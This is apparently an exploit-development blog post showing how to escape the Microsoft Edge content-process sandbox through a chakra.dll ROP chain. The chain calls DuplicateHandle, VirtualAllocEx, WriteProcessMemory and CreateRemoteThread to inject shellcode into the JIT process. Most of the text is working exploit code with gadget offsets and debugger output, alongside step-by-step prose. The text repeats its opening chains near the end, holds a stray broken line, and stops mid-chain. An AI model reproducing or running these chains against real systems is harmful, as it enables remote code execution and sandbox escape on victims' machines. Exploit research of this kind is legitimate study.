// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();is in its final state
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

Our ROP chain starts with the following gadget:

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret

This gadget is also used four times before our first gadget within the WriteProcessMemory ROP chain. So, we will re-execute our updated exploit and set a breakpoint on this gadget and hit g in WinDbg five times in order to get to our intended first gadget (four times to β€œbypass” the other uses, and once more to get to our intended gadget).

Our first ROP sequence in our case is not going to actually involve WriteProcessMemory. Instead, we are going to store our VirtualAllocEx allocation (which should still be in RAX, as our previous ROP chain called VirtualAllocEx, which places the address of the allocation in RAX) in a β€œpermanent” location within the .data section of kernelbase.dll. Think of this as we are storing the allocation returned from VirtualAllocEx in a β€œglobal variable” (of sorts):

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

At this point we have achieved persistent storage of where we would like to allocate our shellcode (the value returned from VirtualAllocEx). We will be using RAX in our ROP chain for WriteProcessMemory, so in this case we persistently store it so we do not β€œclobber” this value with our ROP chain. Having said that, our first item on the WriteProcessMemory docket is to place the size of our write operation (~ sizeof(shellcode), of 0x1000 bytes) into R9 as the nSize argument.

We start this process, of which there are many examples in this blog post, by placing a writable address in RAX which we do not care about, to grant us access to the mov r9, rcx ; cmp r8d, [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret gadget. This allows us to place our intended value of 0x1000 into R9.

Our call to WriteProcessMemory is now in the following state:

	sizeof(shellcode)				// Size of our shellcode

Next up in our ROP sequence is the hProcess parameter, also known as our PROCESS_ALL_ACCESS handle to the JIT server. We can simply just fetch this from the .data section of chakra.dll, where we stored this value as a result of our DuplicateHandle call.

You’ll notice there is a mov [rax+0x20], rcx write operation that will write the contents of RCX into the memory address, at an offset of 0x20, in RAX. You’ll recall we β€œprepped” RAX already in this ROP sequence when dealing with the nSize parameter - meaning RAX already has a writable address, and the write operation will not cause an access violation (e.g. writing to a non-writable address).

Our call to WriteProcessMemory is now in the following state:

	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	sizeof(shellcode)				// Size of our shellcode

The next parameter we are going to deal with is lpBaseAddress. In our call to WriteProcessMemory, this is the address within the process denoted by the handle supplied in hProcess (the JIT server process where ACG is disabled). We control a region of one memory page within the JIT process, as a result of our VirtualAllocEx ROP chain. This allocation (which resides in the JIT process) is the address we are going to supply here.

This ROP sequence is slightly convoluted, so I will provide the snippet (which is already above) directly below for continuity/context:

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

We can simply pop the address where we stored the address of our JIT process allocation (via VirtualAllocEx) into the RDX register. However, this is where things get β€œinteresting”. There were no good gadgets within chakra.dll to directly dereference RDX and place it into RDX (mov rdx, [rdx] ; ret). The only gadget to do so, as we see above, is mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret. We can see we are able to dereference RDX and store it in RDX, but not via RDX directly instead, we have the ability to take whatever memory address is stored in RDX, at an offset of 0x8, and place this into RDX. So, we do a bit of math here. If we pop our jit_allocation-0x8 into RDX, when the mov rdx, [rdx+0x8] occurs, it will take the value in RDX, add 8 to it, and dereference the contents - storing them in RDX. Since -0x8 + +0x8 = 0, we simply β€œoffset” the difference as a β€œhack”, of sorts, to ensure RDX contains the base address of our allocation.

Our call to WriteProcessMemory is now in the following state:

	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	sizeof(shellcode)				// Size of our shellcode

Now, our next item is to knock out the lpBuffer parameter. This is the easiest of our parameters, as we have already stored the shellcode we want to copy into the remote JIT process in the .data section of chakra.dll (see β€œShellcode” section of this blog post).

Our call is now in the following state:

	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(VirtualAllocEx_Allocation),		// Address of our return value from VirtualAllocEx (where we want to write our shellcode)
	addressof(data_chakra_shellcode_location),	// Address of our shellcode in the content process (.data of chakra) (what we want to write (our shellcode))
	sizeof(shellcode)				// Size of our shellcode
	NULL 						// Optional

The last items on the agenda are to load kernelbase!WriteProcessMemory into RAX and jmp to it, and also write our last parameter to the stack at RSP + 0x28 (NULL/0 value).

Now, before we hit the jmp rax instruction to jump into our call to WriteProcessMemory, let’s attach another WinDbg debugger to the JIT process and examine the lpBaseAddress parameter.

We can see our allocation is valid, but is not set to any value. Let’s hit t in the content process WinDbg session and then pt to execute the call to WriteProcessMemory, but pausing before we return from the function call.

Now, let’s go back to the JIT process WinDbg session and re-examine the contents of the allocation.

As we can see, we have our shellcode mapped into the JIT process. All there is left now (which is a slight misnomer, as it is several more chained ROP chains) is to force the JIT process to mark this code as RWX, and execute it.

CreateRemoteThread ROP Chain

We now have a remote allocation within the JIT process, where we have written our shellcode to. As mentioned, we now need a way to execute this shellcode. As you may, or may not know, on Windows threads are what are responsible for executing code (not a process itself, which can be though of as a β€œcontainer of resources”). What we are going to do now is create a thread within the JIT process, but we are going to create this thread in a suspended manner. As we know, our shellcode is sitting in readable and writable page. We first need to mark this page as RWX, which we will do in the later portions of this blog. So, for now, we will create the thread which will be responsible for executing our shellcode in the future - but we are going to create it in a suspended state and reconcile execution later. CreateRemoteThread is an API, exported by the Windows API, which allows a user to create a thread in a remote process. This will allow us to create a thread within the JIT process, from our current content process. Here is how our call will be setup:

	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	NULL,				// No variable needs to be passed
	4,				// CREATE_SUSPENDED (Create the thread in a suspended state)
	NULL 				// Don't return the thread ID (we don't need it)

This call requires mostly everything to be set to NULL or 0, with the exception of two parameters. We are creating our thread in a suspended state to ensure execution doesn’t occur until we explicitly resume the thread. This is because we still need to overwrite the RSP register of this thread with our final-stage ROP chain, before the ret occurs. Since we are setting the lpStartAddress parameter to the address of a ROP gadget, this effectively is the entry point for this newly-created thread and it should be the function called. Since it is a ROP gadget that performs ret, execution should just return to the stack. So, when we eventually resume this thread, our thread (which is executing in he remote JIT process, where ACG is disabled), will return to whatever is located on the stack. We will eventually update RSP to point to.

Here is how this looks in ROP form (with all previous ROP chains added for context):

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

// VirtuaAllocEx() ROP chain
